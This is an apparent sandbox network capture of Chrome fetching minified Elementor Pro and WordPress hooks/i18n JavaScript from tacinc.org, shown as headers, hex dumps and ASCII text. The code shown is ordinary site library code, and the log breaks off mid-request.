                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _ga=GA1.2.2026524419.1729706650; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:11 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Tue, 15 Oct 2024 16:58:49 GMT
                                                                                                                                                                                                                              ETag: W/"670e9f49-1845"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614821
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5ecadb18789-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC877INData Raw: 31 38 34 35 0d 0a 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 2d 70 72 6f 20 2d 20 76 33 2e 32 34 2e 30 20 2d 20 30 39 2d 31 30 2d 32 30 32 34 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 2c 72 2c 61 2c 6e 3d 7b 7d 2c 63 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 28 65 29 7b 76 61 72 20 72 3d 63 5b 65 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 72 29 72 65 74 75 72 6e 20 72 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 61 3d 63 5b 65 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 6e 5b 65 5d 2e 63 61 6c 6c 28 61 2e 65 78 70 6f 72 74 73 2c 61 2c 61 2e 65 78 70 6f 72 74 73 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 2c 61 2e 65 78 70 6f 72 74
                                                                                                                                                                                                                              Data Ascii: 1845/*! elementor-pro - v3.24.0 - 09-10-2024 */(()=>{"use strict";var e,r,a,n={},c={};function __webpack_require__(e){var r=c[e];if(void 0!==r)return r.exports;var a=c[e]={exports:{}};return n[e].call(a.exports,a,a.exports,__webpack_require__),a.export
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 34 62 30 37 32 35 39 32 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 3a 35 31 39 3d 3d 3d 65 3f 22 76 69 64 65 6f 2d 70 6c 61 79 6c 69 73 74 2e 61 66 32 30 66 64 39 66 64 38 37 37 38 39 32 39 38 32 39 65 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 3a 33 37 35 3d 3d 3d 65 3f 22 70 61 79 70 61 6c 2d 62 75 74 74 6f 6e 2e 66 34 66 36 34 65 34 36 31 37 33 66 35 30 37 30 31 39 34 39 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 3a 32 33 34 3d 3d 3d 65 3f 22 35 32 65 30 33 32 39 38 65 37 66 30 38 35 32 63 39 36 61 31 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 3a 38 35 37 3d 3d 3d 65 3f 22 73 74 72 69 70 65 2d 62 75 74 74 6f 6e 2e 36 31 64 39 33 35 39 34 64 36 62 37 38 36 35 66 38 62 33 66 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 3a 35 38 31 3d 3d 3d 65 3f
                                                                                                                                                                                                                              Data Ascii: 4b072592.bundle.min.js":519===e?"video-playlist.af20fd9fd8778929829e.bundle.min.js":375===e?"paypal-button.f4f64e46173f50701949.bundle.min.js":234===e?"52e03298e7f0852c96a1.bundle.min.js":857===e?"stripe-button.61d93594d6b7865f8b3f.bundle.min.js":581===e?
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 6d 6d 65 72 63 65 2d 6d 65 6e 75 2d 63 61 72 74 2e 65 62 36 31 66 65 30 38 36 32 34 35 34 38 35 33 31 30 61 34 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 3a 38 30 3d 3d 3d 65 3f 22 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 75 72 63 68 61 73 65 2d 73 75 6d 6d 61 72 79 2e 33 36 37 36 63 63 64 38 63 32 39 65 66 30 39 32 34 62 38 34 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 3a 33 35 34 3d 3d 3d 65 3f 22 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 68 65 63 6b 6f 75 74 2d 70 61 67 65 2e 37 37 36 62 34 63 65 63 34 35 30 37 30 66 65 33 32 36 33 36 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 3a 34 3d 3d 3d 65 3f 22 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 61 72 74 2e 64 30 64 30 31 35 33 30 66 35 62 65 36 37 33 36 62 35 64 32 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73
                                                                                                                                                                                                                              Data Ascii: mmerce-menu-cart.eb61fe086245485310a4.bundle.min.js":80===e?"woocommerce-purchase-summary.3676ccd8c29ef0924b84.bundle.min.js":354===e?"woocommerce-checkout-page.776b4cec45070fe32636.bundle.min.js":4===e?"woocommerce-cart.d0d01530f5be6736b5d2.bundle.min.js
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 6c 6f 62 61 6c 54 68 69 73 29 72 65 74 75 72 6e 20 67 6c 6f 62 61 6c 54 68 69 73 3b 74 72 79 7b 72 65 74 75 72 6e 20 74 68 69 73 7c 7c 6e 65 77 20 46 75 6e 63 74 69 6f 6e 28 22 72 65 74 75 72 6e 20 74 68 69 73 22 29 28 29 7d 63 61 74 63 68 28 65 29 7b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 29 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 7d 7d 28 29 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6f 3d 28 65 2c 72 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 65 2c 72 29 2c 72 3d 7b 7d 2c 61 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 70 72 6f 3a 22 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6c 3d 28 65 2c 6e 2c 63 2c 69 29
                                                                                                                                                                                                                              Data Ascii: lobalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window)return window}}(),__webpack_require__.o=(e,r)=>Object.prototype.hasOwnProperty.call(e,r),r={},a="elementor-pro:",__webpack_require__.l=(e,n,c,i)
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1237INData Raw: 72 28 22 41 75 74 6f 6d 61 74 69 63 20 70 75 62 6c 69 63 50 61 74 68 20 69 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 20 69 6e 20 74 68 69 73 20 62 72 6f 77 73 65 72 22 29 3b 65 3d 65 2e 72 65 70 6c 61 63 65 28 2f 23 2e 2a 24 2f 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 3f 2e 2a 24 2f 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2f 5b 5e 5c 2f 5d 2b 24 2f 2c 22 2f 22 29 2c 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 70 3d 65 7d 29 28 29 2c 28 28 29 3d 3e 7b 76 61 72 20 65 3d 7b 39 37 38 3a 30 7d 3b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 66 2e 6a 3d 28 72 2c 61 29 3d 3e 7b 76 61 72 20 6e 3d 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6f 28 65 2c 72 29 3f 65 5b 72 5d 3a 76 6f 69 64 20 30 3b 69 66 28
                                                                                                                                                                                                                              Data Ascii: r("Automatic publicPath is not supported in this browser");e=e.replace(/#.*$/,"").replace(/\?.*$/,"").replace(/\/[^\/]+$/,"/"),__webpack_require__.p=e})(),(()=>{var e={978:0};__webpack_require__.f.j=(r,a)=>{var n=__webpack_require__.o(e,r)?e[r]:void 0;if(
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              119192.168.2.649855141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC777OUTGET /wp-content/uploads/hummingbird-assets/2041663b2e746e59e63362466c21f79b.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1; _ga=GA1.2.2026524419.1729706650; _gid=GA1.2.1313925292.1729706650; _gat_UA-26451691-1=1
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:11 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Wed, 16 Oct 2024 14:55:48 GMT
                                                                                                                                                                                                                              ETag: W/"670fd3f4-34aa"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614821
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5ed3aaf6ba7-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC877INData Raw: 33 34 61 61 0d 0a 2f 2a 2a 68 61 6e 64 6c 65 73 3a 77 70 2d 68 6f 6f 6b 73 2c 77 70 2d 69 31 38 6e 2a 2a 2f 0d 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 28 28 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 74 3d 7b 64 3a 28 65 2c 6e 29 3d 3e 7b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 6e 29 74 2e 6f 28 6e 2c 72 29 26 26 21 74 2e 6f 28 65 2c 72 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 72 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 6e 5b 72 5d 7d 29 7d 2c 6f 3a 28 74 2c 65 29 3d 3e 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 65 29 2c 72 3a 74 3d 3e 7b
                                                                                                                                                                                                                              Data Ascii: 34aa/**handles:wp-hooks,wp-i18n**//*! This file is auto-generated */(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 74 20 62 65 20 61 20 6e 6f 6e 2d 65 6d 70 74 79 20 73 74 72 69 6e 67 2e 22 29 2c 21 31 29 3a 21 21 2f 5e 5b 61 2d 7a 41 2d 5a 5d 5b 61 2d 7a 41 2d 5a 30 2d 39 5f 2e 5c 2d 5c 2f 5d 2a 24 2f 2e 74 65 73 74 28 74 29 7c 7c 28 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 54 68 65 20 6e 61 6d 65 73 70 61 63 65 20 63 61 6e 20 6f 6e 6c 79 20 63 6f 6e 74 61 69 6e 20 6e 75 6d 62 65 72 73 2c 20 6c 65 74 74 65 72 73 2c 20 64 61 73 68 65 73 2c 20 70 65 72 69 6f 64 73 2c 20 75 6e 64 65 72 73 63 6f 72 65 73 20 61 6e 64 20 73 6c 61 73 68 65 73 2e 22 29 2c 21 31 29 7d 3b 63 6f 6e 73 74 20 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 7c 7c 22 22 3d 3d 3d 74 3f 28 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28
                                                                                                                                                                                                                              Data Ascii: t be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only contain numbers, letters, dashes, periods, underscores and slashes."),!1)};const r=function(t){return"string"!=typeof t||""===t?(console.error(
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 3b 65 2d 2d 29 74 5b 65 5d 2e 6e 61 6d 65 73 70 61 63 65 3d 3d 3d 73 26 26 28 74 2e 73 70 6c 69 63 65 28 65 2c 31 29 2c 6c 2b 2b 2c 63 2e 5f 5f 63 75 72 72 65 6e 74 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 74 2e 6e 61 6d 65 3d 3d 3d 69 26 26 74 2e 63 75 72 72 65 6e 74 49 6e 64 65 78 3e 3d 65 26 26 74 2e 63 75 72 72 65 6e 74 49 6e 64 65 78 2d 2d 7d 29 29 29 7d 72 65 74 75 72 6e 22 68 6f 6f 6b 52 65 6d 6f 76 65 64 22 21 3d 3d 69 26 26 74 2e 64 6f 41 63 74 69 6f 6e 28 22 68 6f 6f 6b 52 65 6d 6f 76 65 64 22 2c 69 2c 73 29 2c 6c 7d 7d 3b 63 6f 6e 73 74 20 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b 63 6f 6e 73 74 20 6f 3d 74 5b 65 5d 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 72 3f 6e
                                                                                                                                                                                                                              Data Ascii: ;e--)t[e].namespace===s&&(t.splice(e,1),l++,c.__current.forEach((t=>{t.name===i&&t.currentIndex>=e&&t.currentIndex--})))}return"hookRemoved"!==i&&t.doAction("hookRemoved",i,s),l}};const s=function(t,e){return function(n,r){const o=t[e];return void 0!==r?n
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 29 2c 74 68 69 73 2e 68 61 73 46 69 6c 74 65 72 3d 73 28 74 68 69 73 2c 22 66 69 6c 74 65 72 73 22 29 2c 74 68 69 73 2e 72 65 6d 6f 76 65 41 6c 6c 41 63 74 69 6f 6e 73 3d 69 28 74 68 69 73 2c 22 61 63 74 69 6f 6e 73 22 2c 21 30 29 2c 74 68 69 73 2e 72 65 6d 6f 76 65 41 6c 6c 46 69 6c 74 65 72 73 3d 69 28 74 68 69 73 2c 22 66 69 6c 74 65 72 73 22 2c 21 30 29 2c 74 68 69 73 2e 64 6f 41 63 74 69 6f 6e 3d 63 28 74 68 69 73 2c 22 61 63 74 69 6f 6e 73 22 29 2c 74 68 69 73 2e 61 70 70 6c 79 46 69 6c 74 65 72 73 3d 63 28 74 68 69 73 2c 22 66 69 6c 74 65 72 73 22 2c 21 30 29 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 41 63 74 69 6f 6e 3d 6c 28 74 68 69 73 2c 22 61 63 74 69 6f 6e 73 22 29 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 46 69 6c 74 65 72 3d 6c 28 74 68 69 73 2c
                                                                                                                                                                                                                              Data Ascii: ),this.hasFilter=s(this,"filters"),this.removeAllActions=i(this,"actions",!0),this.removeAllFilters=i(this,"filters",!0),this.doAction=c(this,"actions"),this.applyFilters=c(this,"filters",!0),this.currentAction=l(this,"actions"),this.currentFilter=l(this,
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 29 7b 69 66 28 28 73 3d 74 5b 6e 5d 29 2e 6b 65 79 73 29 66 6f 72 28 72 3d 65 5b 64 5d 2c 6f 3d 30 3b 6f 3c 73 2e 6b 65 79 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 7b 69 66 28 6e 75 6c 6c 3d 3d 72 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 61 28 27 5b 73 70 72 69 6e 74 66 5d 20 43 61 6e 6e 6f 74 20 61 63 63 65 73 73 20 70 72 6f 70 65 72 74 79 20 22 25 73 22 20 6f 66 20 75 6e 64 65 66 69 6e 65 64 20 76 61 6c 75 65 20 22 25 73 22 27 2c 73 2e 6b 65 79 73 5b 6f 5d 2c 73 2e 6b 65 79 73 5b 6f 2d 31 5d 29 29 3b 72 3d 72 5b 73 2e 6b 65 79 73 5b 6f 5d 5d 7d 65 6c 73 65 20 72 3d 73 2e 70 61 72 61 6d 5f 6e 6f 3f 65 5b 73 2e 70 61 72 61 6d 5f 6e 6f 5d 3a 65 5b 64 2b 2b 5d 3b 69 66 28 69 2e 6e 6f 74 5f 74 79 70 65 2e 74 65 73 74 28 73 2e 74 79 70 65 29 26 26 69
                                                                                                                                                                                                                              Data Ascii: ){if((s=t[n]).keys)for(r=e[d],o=0;o<s.keys.length;o++){if(null==r)throw new Error(a('[sprintf] Cannot access property "%s" of undefined value "%s"',s.keys[o],s.keys[o-1]));r=r[s.keys[o]]}else r=s.param_no?e[s.param_no]:e[d++];if(i.not_type.test(s.type)&&i
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 22 3a 72 3d 28 70 61 72 73 65 49 6e 74 28 72 2c 31 30 29 3e 3e 3e 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 58 22 3a 72 3d 28 70 61 72 73 65 49 6e 74 28 72 2c 31 30 29 3e 3e 3e 30 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 7d 69 2e 6a 73 6f 6e 2e 74 65 73 74 28 73 2e 74 79 70 65 29 3f 67 2b 3d 72 3a 28 21 69 2e 6e 75 6d 62 65 72 2e 74 65 73 74 28 73 2e 74 79 70 65 29 7c 7c 63 26 26 21 73 2e 73 69 67 6e 3f 66 3d 22 22 3a 28 66 3d 63 3f 22 2b 22 3a 22 2d 22 2c 72 3d 72 2e 74 6f 53 74 72 69 6e 67 28 29 2e 72 65 70 6c 61 63 65 28 69 2e 73 69 67 6e 2c 22 22 29 29 2c 75 3d 73 2e 70 61 64 5f 63 68 61 72 3f 22 30 22 3d 3d 3d 73 2e 70 61 64 5f 63 68 61 72 3f 22 30 22 3a 73 2e 70 61 64
                                                                                                                                                                                                                              Data Ascii: ":r=(parseInt(r,10)>>>0).toString(16);break;case"X":r=(parseInt(r,10)>>>0).toString(16).toUpperCase()}i.json.test(s.type)?g+=r:(!i.number.test(s.type)||c&&!s.sign?f="":(f=c?"+":"-",r=r.toString().replace(i.sign,"")),u=s.pad_char?"0"===s.pad_char?"0":s.pad
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 66 3d 61 2c 65 2e 76 73 70 72 69 6e 74 66 3d 6f 2c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 28 77 69 6e 64 6f 77 2e 73 70 72 69 6e 74 66 3d 61 2c 77 69 6e 64 6f 77 2e 76 73 70 72 69 6e 74 66 3d 6f 2c 76 6f 69 64 20 30 3d 3d 3d 28 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 73 70 72 69 6e 74 66 3a 61 2c 76 73 70 72 69 6e 74 66 3a 6f 7d 7d 2e 63 61 6c 6c 28 65 2c 72 2c 65 2c 74 29 29 7c 7c 28 74 2e 65 78 70 6f 72 74 73 3d 6e 29 29 7d 28 29 7d 7d 2c 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 72 28 6e 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 69 29 72 65 74 75 72 6e 20 69 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 61 3d 65 5b 6e 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b
                                                                                                                                                                                                                              Data Ascii: f=a,e.vsprintf=o,"undefined"!=typeof window&&(window.sprintf=a,window.vsprintf=o,void 0===(n=function(){return{sprintf:a,vsprintf:o}}.call(e,r,e,t))||(t.exports=n))}()}},e={};function r(n){var i=e[n];if(void 0!==i)return i.exports;var a=e[n]={exports:{}};
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 73 2c 73 2e 6e 65 78 74 3d 72 29 3a 6e 3d 73 2c 69 3d 3d 3d 65 2e 6d 61 78 53 69 7a 65 3f 28 6e 3d 6e 2e 70 72 65 76 29 2e 6e 65 78 74 3d 6e 75 6c 6c 3a 69 2b 2b 2c 72 3d 73 2c 73 2e 76 61 6c 7d 72 65 74 75 72 6e 20 65 3d 65 7c 7c 7b 7d 2c 61 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 3d 6e 75 6c 6c 2c 6e 3d 6e 75 6c 6c 2c 69 3d 30 7d 2c 61 7d 28 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 74 2c 2e 2e 2e 72 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 65 28 29 2e 73 70 72 69 6e 74 66 28 74 2c 2e 2e 2e 72 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 26 26 69 28 22 73 70 72 69 6e 74 66 20 65 72 72 6f 72 3a 20 5c 6e 5c 6e 22 2b 65 2e 74 6f 53 74 72 69 6e
                                                                                                                                                                                                                              Data Ascii: s,s.next=r):n=s,i===e.maxSize?(n=n.prev).next=null:i++,r=s,s.val}return e=e||{},a.clear=function(){r=null,n=null,i=0},a}(console.error);function a(t,...r){try{return e().sprintf(t,...r)}catch(e){return e instanceof Error&&i("sprintf error: \n\n"+e.toStrin
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 73 2c 6c 3d 5b 5d 3b 66 6f 72 28 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 69 66 28 6f 3d 74 5b 72 5d 2c 61 3d 70 5b 6f 5d 29 7b 66 6f 72 28 6e 3d 61 2e 6c 65 6e 67 74 68 2c 69 3d 41 72 72 61 79 28 6e 29 3b 6e 2d 2d 3b 29 69 5b 6e 5d 3d 6c 2e 70 6f 70 28 29 3b 74 72 79 7b 73 3d 61 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 69 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 20 74 7d 7d 65 6c 73 65 20 73 3d 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 6f 29 3f 65 5b 6f 5d 3a 2b 6f 3b 6c 2e 70 75 73 68 28 73 29 7d 72 65 74 75 72 6e 20 6c 5b 30 5d 7d 28 65 2c 74 29 7d 7d 76 61 72 20 66 3d 7b 63 6f 6e 74 65 78 74 44 65 6c 69 6d 69 74 65 72 3a 22 04 22 2c 6f 6e 4d 69 73 73 69 6e 67 4b 65 79 3a 6e 75 6c 6c 7d 3b 66 75 6e 63 74 69 6f 6e 20 64
                                                                                                                                                                                                                              Data Ascii: s,l=[];for(r=0;r<t.length;r++){if(o=t[r],a=p[o]){for(n=a.length,i=Array(n);n--;)i[n]=l.pop();try{s=a.apply(null,i)}catch(t){return t}}else s=e.hasOwnProperty(o)?e[o]:+o;l.push(s)}return l[0]}(e,t)}}var f={contextDelimiter:"",onMissingKey:null};function d
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC1369INData Raw: 74 22 2c 65 2c 72 2c 69 2c 61 29 3d 3e 28 6e 2e 64 61 74 61 5b 74 5d 7c 7c 6f 28 76 6f 69 64 20 30 2c 74 29 2c 6e 2e 64 63 6e 70 67 65 74 74 65 78 74 28 74 2c 65 2c 72 2c 69 2c 61 29 29 2c 75 3d 28 74 3d 22 64 65 66 61 75 6c 74 22 29 3d 3e 74 2c 70 3d 28 74 2c 65 2c 6e 29 3d 3e 7b 6c 65 74 20 69 3d 6c 28 6e 2c 65 2c 74 29 3b 72 65 74 75 72 6e 20 72 3f 28 69 3d 72 2e 61 70 70 6c 79 46 69 6c 74 65 72 73 28 22 69 31 38 6e 2e 67 65 74 74 65 78 74 5f 77 69 74 68 5f 63 6f 6e 74 65 78 74 22 2c 69 2c 74 2c 65 2c 6e 29 2c 72 2e 61 70 70 6c 79 46 69 6c 74 65 72 73 28 22 69 31 38 6e 2e 67 65 74 74 65 78 74 5f 77 69 74 68 5f 63 6f 6e 74 65 78 74 5f 22 2b 75 28 6e 29 2c 69 2c 74 2c 65 2c 6e 29 29 3a 69 7d 3b 69 66 28 74 26 26 73 28 74 2c 65 29 2c 72 29 7b 63 6f 6e 73
                                                                                                                                                                                                                              Data Ascii: t",e,r,i,a)=>(n.data[t]||o(void 0,t),n.dcnpgettext(t,e,r,i,a)),u=(t="default")=>t,p=(t,e,n)=>{let i=l(n,e,t);return r?(i=r.applyFilters("i18n.gettext_with_context",i,t,e,n),r.applyFilters("i18n.gettext_with_context_"+u(n),i,t,e,n)):i};if(t&&s(t,e),r){cons


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              120192.168.2.649856141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:11 UTC777OUTGET /wp-content/uploads/hummingbird-assets/3f86132df1672ee9bc320961d8b32c63.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
